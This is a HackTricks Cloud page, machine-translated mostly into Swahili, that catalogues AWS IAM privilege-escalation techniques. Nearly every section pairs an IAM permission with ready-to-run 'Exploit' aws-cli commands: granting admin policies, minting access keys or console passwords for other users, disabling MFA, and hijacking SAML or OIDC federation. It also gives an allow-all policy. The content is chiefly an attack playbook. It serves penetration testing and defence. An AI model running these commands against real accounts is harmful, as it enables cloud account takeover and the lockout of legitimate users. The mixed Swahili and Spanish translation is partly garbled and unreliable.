AWS - IAM Privesc

Reading time: 8 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

IAM

Kwa maelezo zaidi kuhusu IAM angalia:

AWS - IAM, Identity Center & SSO Enum

`iam:CreatePolicyVersion`

Inatoa uwezo wa kuunda toleo jipya la sera ya IAM, ukiepuka hitaji la ruhusa ya iam:SetDefaultPolicyVersion kwa kutumia bendera --set-as-default. Hii inaruhusu kufafanua ruhusa maalum.

Exploit Command:

bash

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Athari: Inaongeza mamlaka moja kwa moja kwa kuruhusu kitendo chochote kwenye rasilimali yoyote.

`iam:SetDefaultPolicyVersion`

Inaruhusu kubadilisha toleo chaguo-msingi la sera ya IAM kuwa toleo jingine lililopo, na inaweza kuongeza mamlaka ikiwa toleo jipya lina ruhusa zaidi.

Amri ya Bash:

bash

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Athari: Inasababisha privilege escalation isiyo ya moja kwa moja kwa kuwezesha ruhusa zaidi.

`iam:CreateAccessKey`

Inaruhusu kuunda access key ID na secret access key kwa mtumiaji mwingine, ambayo inaweza kusababisha privilege escalation.

Exploit:

bash

aws iam create-access-key --user-name <target_user>

Impact: Direct privilege escalation kwa kuchukua ruhusa zilizopanuliwa za mtumiaji mwingine.

`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`

Inaruhusu kuunda au kusasisha login profile, ikijumuisha kuweka nywila kwa ajili ya AWS console login, na kusababisha direct privilege escalation.

Exploit for Creation:

bash

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Exploit kwa Sasisho:

bash

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Impact: Moja kwa moja privilege escalation kwa kuingia kama mtumiaji "yeyote".

`iam:UpdateAccessKey`

Inaruhusu kuwezesha access key iliyozimwa, ambayo inaweza kusababisha upatikanaji usioruhusiwa ikiwa attacker anamiliki access key iliyozimwa.

Exploit:

bash

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Athari: Direct privilege escalation by reactivating access keys.

`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`

Inaiwezesha kutengeneza au kuweka upya credentials kwa huduma maalum za AWS (kwa mfano, CodeCommit, Amazon Keyspaces), ikimrithi permissions za mtumiaji aliyehusishwa.

Exploit for Creation:

bash

aws iam create-service-specific-credential --user-name <username> --service-name <service>

Exploit kwa Reset:

bash

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Athari: Kuinua ruhusa moja kwa moja ndani ya idhini za huduma za mtumiaji.

`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`

Inaruhusu kuambatisha sera kwa watumiaji au vikundi, na hivyo kuinua ruhusa moja kwa moja kwa kurithi idhini za sera iliyowekwa.

Exploit for User:

bash

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Exploit kwa Kikundi:

bash

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Athari: Direct privilege escalation kwa chochote sera inakipa.

`iam:AttachRolePolicy`, ( `sts:AssumeRole`|`iam:createrole`) | `iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`

Inaruhusu kuambatisha au kuweka sera kwa roles, users, au groups, ikiruhusu direct privilege escalation kwa kutoa ruhusa za ziada.

Exploit for Role:

bash

aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

Exploit kwa Inline Policies:

bash

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

Unaweza kutumia sera kama:

json

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

Athari: Direct privilege escalation by adding permissions through policies.

`iam:AddUserToGroup`

Inaruhusu kujiongezea mwenyewe kwenye kikundi cha IAM, escalating privileges kwa kurithi ruhusa za kikundi.

Exploit:

bash

aws iam add-user-to-group --group-name <group_name> --user-name <username>

Athari: Direct privilege escalation to the level of the group's permissions.

`iam:UpdateAssumeRolePolicy`

Inaruhusu kubadilisha assume role policy document ya role, na hivyo kuruhusu assumption ya role na permissions zake zinazohusiana.

Exploit:

bash

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

Ambapo sera inavyoonekana kama ifuatayo, ambayo inampa mtumiaji ruhusa ya kuchukua jukumu:

json

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

Athari: privilege escalation ya moja kwa moja kwa kuchukua ruhusa za role yoyote.

`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`

Inaruhusu kupakia SSH public key kwa ajili ya kuthibitisha utambulisho kwenye CodeCommit na ku-deactivate vifaa vya MFA, jambo linaloweza kusababisha indirect privilege escalation.

Exploit for SSH Key Upload:

bash

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

Exploit kwa kuzima MFA:

bash

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

Athari: Kupandishwa kwa ruhusa kwa njia isiyo ya moja kwa moja kwa kuwezesha upatikanaji wa CodeCommit au kuzima ulinzi wa MFA.

`iam:ResyncMFADevice`

Inaruhusu kusawazisha tena kifaa cha MFA, jambo ambalo linaweza kusababisha kupandishwa kwa ruhusa kwa njia isiyo ya moja kwa moja kwa kuathiri ulinzi wa MFA.

Bash Command:

bash

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Impact: Kuongezeka kwa mamlaka kwa njia isiyo ya moja kwa moja kwa kuongeza au kubadilisha MFA devices.

`iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)

Kwa ruhusa hizi unaweza kubadilisha metadata ya XML ya muunganisho wa SAML. Kisha, unaweza kuutumia vibaya SAML federation ili login kwa yoyote role inayomwamini.

Tambua kwamba ukifanya hivi watumiaji halali hawataweza kuingia (login). Hata hivyo, unaweza kupata XML, ukaweka yako, kuingia na kurekebisha mipangilio ya awali ili iendelee kufanya kazi.

bash

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

note

TODO: Chombo kinachoweza kuzalisha metadata ya SAML na ku-login kwa role maalum

`iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:``GetOpenIDConnectProvider`)

(Sina uhakika kuhusu hili) Iwapo mshambuliaji ana hizi permissions, anaweza kuongeza Thumbprint mpya ili kuweza ku-login katika roles zote zinazomwamini provider.

bash

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

`iam:PutUserPermissionsBoundary`

Ruhusa hii inamruhusu attacker kusasisha permissions boundary ya user, na hivyo inawezekana kwamba ataongeza privileges zao kwa kuwawezesha kufanya vitendo ambavyo kwa kawaida vimezuiliwa na permissions walizokuwa nazo.

bash

aws iam put-user-permissions-boundary \
--user-name <nombre_usuario> \
--permissions-boundary arn:aws:iam::<cuenta>:policy/<nombre_politica>

Un ejemplo de una política que no aplica ninguna restricción es:


{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "BoundaryAllowAll",
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}

`iam:PutRolePermissionsBoundary`

Mtu aliye na iam:PutRolePermissionsBoundary anaweza kuweka permissions boundary kwenye role iliyopo. Hatari inapotokea mtu mwenye ruhusa hii anapobadilisha boundary ya role: wanaweza kupunguza vibaya shughuli (kusababisha service disruption) au, iwapo wanaweka permissive boundary, kupanua kwa ufanisi kile role inaweza kufanya na escalate privileges.

bash

aws iam put-role-permissions-boundary \
--role-name <Role_Name> \
--permissions-boundary arn:aws:iam::111122223333:policy/BoundaryPolicy

Marejeleo

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud